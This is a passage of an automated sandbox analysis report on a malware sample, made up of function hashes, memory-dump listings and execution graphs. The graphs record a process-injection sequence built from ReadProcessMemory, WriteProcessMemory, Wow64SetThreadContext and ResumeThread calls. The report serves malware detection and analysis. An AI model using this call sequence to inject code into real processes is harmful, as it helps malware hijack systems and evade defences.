                        • Opcode Fuzzy Hash: 5f08407f83b9ed5097e2801a46afa82a014d65f808aabcca69dc2a150ca54f6e
                        • Instruction Fuzzy Hash: 79D052328006008FD300FA28DA82788B7A0EBA2208F18C16AD04A8B300EF29D44BA741
                        Function 070834D0 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a4532e9c96f1c8de98c0e6275ee87924a9153dcde0e46bb8f3bfe6fe24d562e0
                        • Instruction ID: c233e2613b0b06bee175cf9a4a45fd1b4ae5b85d9d0b4631107e91e6f4793522
                        • Opcode Fuzzy Hash: a4532e9c96f1c8de98c0e6275ee87924a9153dcde0e46bb8f3bfe6fe24d562e0
                        • Instruction Fuzzy Hash: 54D0A97190620CEF8B00EFA0D80149EBFFDEB49200B4005EAE906C7200EE316A009B92
                        Function 0708D0D0 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d11007c23fc98d544ffae50db52b627223c307689a30d44a6f6440606652b8f0
                        • Instruction ID: 60eab747ebe8dc8719f4655866a00cca5c07039fe0ecdf8dad328cdca4f1d028
                        • Opcode Fuzzy Hash: d11007c23fc98d544ffae50db52b627223c307689a30d44a6f6440606652b8f0
                        • Instruction Fuzzy Hash: 66D09E202092815FCB47C77898A0054BFB19F8B208319A0DAD498C7257D7219C139714
                        Function 0708D760 Relevance: .0, Instructions: 13COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ed81f9f57f4b4e070976eed00e779d7296e0c6984385fb2b0326f3dbea3c2435
                        • Instruction ID: a14692651f9c8ca45ce6c58f1b4b3373846ed4e0ce8c24bd315b52938b8cecbd
                        • Opcode Fuzzy Hash: ed81f9f57f4b4e070976eed00e779d7296e0c6984385fb2b0326f3dbea3c2435
                        • Instruction Fuzzy Hash: 84D0C97121D2C25EC7039B78A8A0894BF315E8721472C94D6D485CB15BCB255817D760
                        Function 0708F400 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04e10050bd1740918bdd87b7bb0618fa9a78f94868c247f2ac443650c415ffdb
                        • Instruction ID: 170ec640c0842d9dc1cbdb3f228a925979573cfe4a606936c7896975ca6c929f
                        • Opcode Fuzzy Hash: 04e10050bd1740918bdd87b7bb0618fa9a78f94868c247f2ac443650c415ffdb
                        • Instruction Fuzzy Hash: E2C08CB004064887D3842BE0B90E3243EA87B00202F841220D14D008A28BF894D4D666
                        Function 07085360 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8cc3e887278cfade634f5e6264b96498b6115f12efaba03fe720c878443ba6db
                        • Instruction ID: 5bf3008d9492b0019c55d22a7b32368d900e5255ea230e391d2516683cf5b674
                        • Opcode Fuzzy Hash: 8cc3e887278cfade634f5e6264b96498b6115f12efaba03fe720c878443ba6db
                        • Instruction Fuzzy Hash: ADC012A090D3806FC701C674EC524027B514B85100729C0DA9854CB393D519DC0B8352
                        Function 0708AAD1 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 857cdf7025eb7b94d42ddc9079f070c857bcb6d1d759e6333aa029f95a7729d9
                        • Instruction ID: ebdd77f7fefce384cd6331b7834f24627ee1fbec58dfb336ed422dafba310d01
                        • Opcode Fuzzy Hash: 857cdf7025eb7b94d42ddc9079f070c857bcb6d1d759e6333aa029f95a7729d9
                        • Instruction Fuzzy Hash: 74C012650093C0AECB433B609C10C457FB0AE43304319C0D2E2808A073D1114434D712
                        Function 07084DA0 Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4abe66b13036ec07a6fe499f439ab07206d97fd97daea4fff5c66b46783e0cad
                        • Instruction ID: 6d3de53372036b97196a19924b699114a8b29f77cc17b13a347388d2fcd4d9b3
                        • Opcode Fuzzy Hash: 4abe66b13036ec07a6fe499f439ab07206d97fd97daea4fff5c66b46783e0cad
                        • Instruction Fuzzy Hash: A3C09B75154241DF8681BF58D9C4C5A7EE5FF56300B41DD56F18546430DB31C5389713
                        Function 070890BF Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d92d1fba5427a8609cd0348be28fa8b806663311d98864e37e6ca1bacf82a7f6
                        • Instruction ID: f7f01a51897ec0558dea8213cf09f0eb7f97c628bef0d803ca2e46aec8508d56
                        • Opcode Fuzzy Hash: d92d1fba5427a8609cd0348be28fa8b806663311d98864e37e6ca1bacf82a7f6
                        • Instruction Fuzzy Hash: 00C002B4D3C248CFDB62BFA1D4544BC7F79AA1B201F21465A91B7A7252C6202904CF15
                        Function 0708AE80 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 29a15216351ca6c3cfd219366c9480179f24db80a5d46023792d43891d0393ee
                        • Instruction ID: c121a5dca3f099c88308d21195e77bdf95840e18e6732bdce24d6a018dc843fb
                        • Opcode Fuzzy Hash: 29a15216351ca6c3cfd219366c9480179f24db80a5d46023792d43891d0393ee
                        • Instruction Fuzzy Hash: A6B012F5264340E960407AF48880A7F7C61EBB3B00F40DE6F33CD00040C9705466D13B
                        Function 07081041 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f7f54f5ff13b03c1a33e64e240fe6406a9ecd09a7c23d75daeabb4e1b690f0b8
                        • Instruction ID: b18f9529edfe475b2d1460f68547ff8b71bfec10d801e69e7b26d32fac5ba838
                        • Opcode Fuzzy Hash: f7f54f5ff13b03c1a33e64e240fe6406a9ecd09a7c23d75daeabb4e1b690f0b8
                        • Instruction Fuzzy Hash: D3B0122500374403E1014220CBC2383D7C0A741808F89418448C045FC1D20483079200
                        Function 0708904E Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0c3dc309454833257168a197c388ae12bed5593f624bd22ff657dd2ff0bceb9
                        • Instruction ID: c38b45f269304c021985c73fcaa73a6748df2ea54b63cefcba37554770d2cb62
                        • Opcode Fuzzy Hash: a0c3dc309454833257168a197c388ae12bed5593f624bd22ff657dd2ff0bceb9
                        • Instruction Fuzzy Hash: 32C048B0D2C208CFDB61AFA1D4484BDBF79AB0E601F204629A077A3202CA202800CF00
                        Function 070887A0 Relevance: .0, Instructions: 5COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

                        Non-executed Functions

                        Function 071D3610 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aff79ee5ec981dcc1650cdaa2a12fe593b0502e0466ba6b5bbd09ef34481fc13
                        • Instruction ID: e11b802c6f6e8868a8888cd47832228d7376945527d9f515b302f4923d230483
                        • Opcode Fuzzy Hash: aff79ee5ec981dcc1650cdaa2a12fe593b0502e0466ba6b5bbd09ef34481fc13
                        • Instruction Fuzzy Hash: F6E1FAB4E00259CFDB14DF99C590AAEFBB2BF89305F248269D414A7355D730AD42CFA1
                        Function 071D3A48 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a612b011ebdccb491b3f0674a3cf1dcc350acf92754d9600b6c7412e78c962ca
                        • Instruction ID: 88fb1e17b0706124eca5ad6d65baf82d63f6e0514787a6ffd7221cb700d3a65b
                        • Opcode Fuzzy Hash: a612b011ebdccb491b3f0674a3cf1dcc350acf92754d9600b6c7412e78c962ca
                        • Instruction Fuzzy Hash: 2EE10BB4E00259CFDB14DFA9C590AAEFBB2BF49305F248269D414A7355D730AD42CFA1
                        Function 071D31D8 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ff66737607e8ea067dca301c21a1093f02c46a883641c1640a44c8164ca7d52
                        • Instruction ID: 60d83429bfea52184161417323afc0e6db08313c88c032517de6b222dc765728
                        • Opcode Fuzzy Hash: 5ff66737607e8ea067dca301c21a1093f02c46a883641c1640a44c8164ca7d52
                        • Instruction Fuzzy Hash: 9EE1FAB4E00259CFDB14DFA9C590AAEFBB2BF49305F248269D414AB355D730AD42CFA1
                        Function 071D59C8 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2936f234c45385eeffccf9be2aa8b363489949e1cd77b1f0d5e67cffeaefe0ba
                        • Instruction ID: c075e49d6a1a3281dfefff56da1f0c166d02e86749b290b4c32eeeb84baeabca
                        • Opcode Fuzzy Hash: 2936f234c45385eeffccf9be2aa8b363489949e1cd77b1f0d5e67cffeaefe0ba
                        • Instruction Fuzzy Hash: 5FE1FDB4E012598FDB14DFA9C590AAEFBB2FF49305F248269D414AB355D730AD42CFA0
                        Function 071D50F0 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 13cff02814970e2e498a4b3cdd2537815528552a0631a3197b453b5d1c49f9f2
                        • Instruction ID: 0dcace36d7df2b59a25a5ceb7403750c73846a65ac2e492d115783acda84e3fc
                        • Opcode Fuzzy Hash: 13cff02814970e2e498a4b3cdd2537815528552a0631a3197b453b5d1c49f9f2
                        • Instruction Fuzzy Hash: CFE11CB4E002598FDB14DFA9C590AAEFBB2FF49305F248269D414AB355D770AD42CFA0
                        Function 0708BB69 Relevance: .3, Instructions: 271COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37f55eab00859198f8c02f60a65017b4fc608157b10be572a5337c5f506e1cb7
                        • Instruction ID: 0b00667d8d1e087588f63ad163a24f946695bd0423068c3cade74acbda6cfb19
                        • Opcode Fuzzy Hash: 37f55eab00859198f8c02f60a65017b4fc608157b10be572a5337c5f506e1cb7
                        • Instruction Fuzzy Hash: 0CD1073192075ACACB00EB64D990A99BBB1FF95300F50D79AE40977221EF706EC9CF91
                        Function 00ADDA34 Relevance: .3, Instructions: 264COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 193ae00cfec41424ffd871f65784153c13dc1d8ffca7ff53671324be1f0a6652
                        • Instruction ID: 9f169fe24e174841b1ece2b7d4975162b292ab5b852686720a6f471b1fd06725
                        • Opcode Fuzzy Hash: 193ae00cfec41424ffd871f65784153c13dc1d8ffca7ff53671324be1f0a6652
                        • Instruction Fuzzy Hash: 30A13A32A002198FCF05DFB4C94499EBBB2FF89304B15857AE907AB366DB31E955CB50
                        Function 0708BB78 Relevance: .3, Instructions: 264COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5cf51581c912f6fd80a742e60e377e656bd03389f4da3a85c9baf9f51a8a5541
                        • Instruction ID: 762b8e5cc19369a6a234602988b880782b6d0dc4151cae1a97407c5db8212671
                        • Opcode Fuzzy Hash: 5cf51581c912f6fd80a742e60e377e656bd03389f4da3a85c9baf9f51a8a5541
                        • Instruction Fuzzy Hash: E0D1073192075ACADB00EB64D990A99BBB1FF95300F50D79AE40977221EF706EC9CF91
                        Function 07083910 Relevance: .1, Instructions: 141COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 206ff49221355c214e81d2041e08cf0d6b02885713210f00fd7118085e6d0bd6
                        • Instruction ID: 9433c0252f10ab1aa20c8e6c1c92d19738f9f76f935cbe732a579ac4c0640053
                        • Opcode Fuzzy Hash: 206ff49221355c214e81d2041e08cf0d6b02885713210f00fd7118085e6d0bd6
                        • Instruction Fuzzy Hash: A4516D71A14604CFD748EF3AE852A9A7FE3BBD8300F04C169D00D9B269EF74250ADB50
                        Function 071D31C0 Relevance: .1, Instructions: 137COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10eec52b7c8af2ac24c0a50f7d09ce229db5e186db8a69eb32ee29d2ebfa211a
                        • Instruction ID: ac103f4e89553c025982ff1ef00be24a899ce2a170a96e89f9d974c93b4f2490
                        • Opcode Fuzzy Hash: 10eec52b7c8af2ac24c0a50f7d09ce229db5e186db8a69eb32ee29d2ebfa211a
                        • Instruction Fuzzy Hash: 15514DB4E012598FDB15CFA9C5906AEFBF2BF89304F24816AD418A7356D7309D42CFA1
                        Function 071D59B8 Relevance: .1, Instructions: 133COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eb8d5b2e6dd0338fe7de005607cf8715e7190bc69d8f0812a5104f2bbbb48741
                        • Instruction ID: 3949286efbc69c733fc6f50d45b3cf488d4c22ae785172649f43fdfc47537135
                        • Opcode Fuzzy Hash: eb8d5b2e6dd0338fe7de005607cf8715e7190bc69d8f0812a5104f2bbbb48741
                        • Instruction Fuzzy Hash: B3510AB4E012598BDB14CFA9C5905AEFBB2FF89305F24816AD418A7356D7309E42CFA1

                        Execution Graph

                        Execution Coverage:1.9%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:2
                        Total number of Limit Nodes:0
                        execution_graph 15526 15db048 DuplicateHandle 15527 15db0de 15526->15527

                        Executed Functions

                        Function 015DB048 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 15db048-15db0dc DuplicateHandle 1 15db0de-15db0e4 0->1 2 15db0e5-15db102 0->2 1->2
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DB0CF
                        Memory Dump Source
                        • Source File: 00000009.00000002.4632164398.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_15d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: cf5722fe992c6ef3144507ab4c41ed8c3d3e26bf9cb98587725ceeb697950613
                        • Instruction ID: 8ab3d792e8c904909ac65b7e07a4ad6069d7e9d563e256c2bf12919fd17359e7
                        • Opcode Fuzzy Hash: cf5722fe992c6ef3144507ab4c41ed8c3d3e26bf9cb98587725ceeb697950613
                        • Instruction Fuzzy Hash: B721E4B59002099FDB10CF9AD984ADEFFF5FB48320F14841AE914A7350D375A950CF61
                        Function 015DB047 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5 15db047-15db0dc DuplicateHandle 6 15db0de-15db0e4 5->6 7 15db0e5-15db102 5->7 6->7
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DB0CF
                        Memory Dump Source
                        • Source File: 00000009.00000002.4632164398.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_15d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: e796785b95afc3cc545ee182475b05960304dca87198e4ab56316fd29f840ee4
                        • Instruction ID: 9b120adbd499756fb74f6f8c6f128aaa25705549086a384631769f715a9440ed
                        • Opcode Fuzzy Hash: e796785b95afc3cc545ee182475b05960304dca87198e4ab56316fd29f840ee4
                        • Instruction Fuzzy Hash: 8021CFB5D00209DFDB10CFAAD984AEEBBF5FB48320F14841AE918A7350D379A954CF61
                        Function 015DB040 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 10 15db040-15db045 11 15db095-15db0dc DuplicateHandle 10->11 12 15db0de-15db0e4 11->12 13 15db0e5-15db102 11->13 12->13
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DB0CF
                        Memory Dump Source
                        • Source File: 00000009.00000002.4632164398.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_15d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: dfb46db5bd896897bebcec535f7256b2c46e7c88c098c749a387f7ef3ecafb2c
                        • Instruction ID: 740827278ea61e0e71b67eafc5cba1b3535c1629820e8a598e77a32a882fc9ba
                        • Opcode Fuzzy Hash: dfb46db5bd896897bebcec535f7256b2c46e7c88c098c749a387f7ef3ecafb2c
                        • Instruction Fuzzy Hash: 6601D3B69002099FEB10CF99D884ADEBBF5EF48324F14850AEA14A7250C375A8518B61

                        Execution Graph

                        Execution Coverage:9.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:199
                        Total number of Limit Nodes:12
                        execution_graph 27356 1004948 27357 1004951 27356->27357 27358 1004957 27357->27358 27362 1004a43 27357->27362 27367 1004104 27358->27367 27360 1004972 27363 1004a65 27362->27363 27371 1004f58 27363->27371 27375 1004f4b 27363->27375 27368 100410f 27367->27368 27383 1007260 27368->27383 27370 10076aa 27370->27360 27372 1004f7f 27371->27372 27373 100505c 27372->27373 27379 1004bb4 27372->27379 27377 1004ed9 27375->27377 27376 100505c 27376->27376 27377->27375 27377->27376 27378 1004bb4 CreateActCtxA 27377->27378 27378->27376 27380 1005fe8 CreateActCtxA 27379->27380 27382 10060ab 27380->27382 27384 100726b 27383->27384 27387 100743c 27384->27387 27386 1007b55 27386->27370 27388 1007447 27387->27388 27391 100746c 27388->27391 27390 1007c3a 27390->27386 27392 1007477 27391->27392 27395 100749c 27392->27395 27394 1007d2d 27394->27390 27396 10074a7 27395->27396 27398 100902b 27396->27398 27401 100b2d9 27396->27401 27397 1009069 27397->27394 27398->27397 27407 100d3a8 27398->27407 27402 100b2e2 27401->27402 27403 100b2a3 27401->27403 27412 100b310 27402->27412 27415 100b303 27402->27415 27403->27398 27404 100b2ee 27404->27398 27408 100d3d9 27407->27408 27409 100d3fd 27408->27409 27439 100d558 27408->27439 27443 100d568 27408->27443 27409->27397 27419 100b3f8 27412->27419 27413 100b31f 27413->27404 27416 100b310 27415->27416 27418 100b3f8 2 API calls 27416->27418 27417 100b31f 27417->27404 27418->27417 27420 100b419 27419->27420 27421 100b43c 27419->27421 27420->27421 27427 100b690 27420->27427 27431 100b6a0 27420->27431 27421->27413 27422 100b640 GetModuleHandleW 27424 100b66d 27422->27424 27423 100b434 27423->27421 27423->27422 27424->27413 27428 100b695 27427->27428 27430 100b6d9 27428->27430 27435 100a790 27428->27435 27430->27423 27432 100b6b4 27431->27432 27433 100b6d9 27432->27433 27434 100a790 LoadLibraryExW 27432->27434 27433->27423 27434->27433 27436 100b860 LoadLibraryExW 27435->27436 27438 100b8d9 27436->27438 27438->27430 27440 100d575 27439->27440 27441 100d5af 27440->27441 27447 100c130 27440->27447 27441->27409 27445 100d575 27443->27445 27444 100d5af 27444->27409 27445->27444 27446 100c130 2 API calls 27445->27446 27446->27444 27448 100c135 27447->27448 27450 100e2c8 27448->27450 27451 100d754 27448->27451 27452 100d75f 27451->27452 27453 100749c 2 API calls 27452->27453 27454 100e337 27453->27454 27454->27450 27455 100da88 27456 100dace 27455->27456 27459 100dc68 27456->27459 27462 100d6f4 27459->27462 27463 100dcd0 DuplicateHandle 27462->27463 27464 100dbbb 27463->27464 27465 7829308 27466 7829493 27465->27466 27468 782932e 27465->27468 27468->27466 27469 7827638 27468->27469 27470 7829588 PostMessageW 27469->27470 27471 78295f4 27470->27471 27471->27468 27472 78269d9 27473 78268f4 27472->27473 27477 7828028 27473->27477 27491 7828038 27473->27491 27474 7826806 27478 7828038 27477->27478 27479 782805a 27478->27479 27505 78284f8 27478->27505 27509 782853a 27478->27509 27513 7828bba 27478->27513 27518 7828b74 27478->27518 27524 78284d3 27478->27524 27529 78288d2 27478->27529 27535 782870d 27478->27535 27541 782860e 27478->27541 27546 7828402 27478->27546 27551 7828aff 27478->27551 27555 782867e 27478->27555 27479->27474 27492 782803f 27491->27492 27493 782805a 27492->27493 27494 7828402 2 API calls 27492->27494 27495 782860e 2 API calls 27492->27495 27496 782870d 2 API calls 27492->27496 27497 78288d2 2 API calls 27492->27497 27498 78284d3 2 API calls 27492->27498 27499 7828b74 2 API calls 27492->27499 27500 7828bba 2 API calls 27492->27500 27501 782853a 2 API calls 27492->27501 27502 78284f8 2 API calls 27492->27502 27503 782867e 2 API calls 27492->27503 27504 7828aff 2 API calls 27492->27504 27493->27474 27494->27493 27495->27493 27496->27493 27497->27493 27498->27493 27499->27493 27500->27493 27501->27493 27502->27493 27503->27493 27504->27493 27560 7826080 27505->27560 27564 7826088 27505->27564 27506 782851a 27506->27479 27568 7825e00 27509->27568 27572 7825df9 27509->27572 27510 7828554 27514 7828bc0 27513->27514 27577 7825910 27514->27577 27581 7825918 27514->27581 27515 7828be6 27519 7828b7d 27518->27519 27521 782849e 27519->27521 27522 7825910 ResumeThread 27519->27522 27523 7825918 ResumeThread 27519->27523 27520 7828be6 27522->27520 27523->27520 27525 7828986 27524->27525 27585 7825f90 27525->27585 27589 7825f98 27525->27589 27526 782849e 27526->27479 27530 78289ec 27529->27530 27593 7829073 27530->27593 27599 78290b8 27530->27599 27604 78290ab 27530->27604 27531 7828a08 27536 7828696 27535->27536 27537 7828df8 27536->27537 27539 7825f90 WriteProcessMemory 27536->27539 27540 7825f98 WriteProcessMemory 27536->27540 27538 78286b7 27538->27479 27539->27538 27540->27538 27542 7828ce8 27541->27542 27544 7825e00 Wow64SetThreadContext 27542->27544 27545 7825df9 Wow64SetThreadContext 27542->27545 27543 7828d03 27544->27543 27545->27543 27547 7828440 27546->27547 27617 7826220 27547->27617 27621 7826214 27547->27621 27553 7825f90 WriteProcessMemory 27551->27553 27554 7825f98 WriteProcessMemory 27551->27554 27552 7828b2d 27553->27552 27554->27552 27556 7828685 27555->27556 27558 7825f90 WriteProcessMemory 27556->27558 27559 7825f98 WriteProcessMemory 27556->27559 27557 78286b7 27557->27479 27558->27557 27559->27557 27561 7826088 ReadProcessMemory 27560->27561 27563 7826117 27561->27563 27563->27506 27565 78260d3 ReadProcessMemory 27564->27565 27567 7826117 27565->27567 27567->27506 27569 7825e45 Wow64SetThreadContext 27568->27569 27571 7825e8d 27569->27571 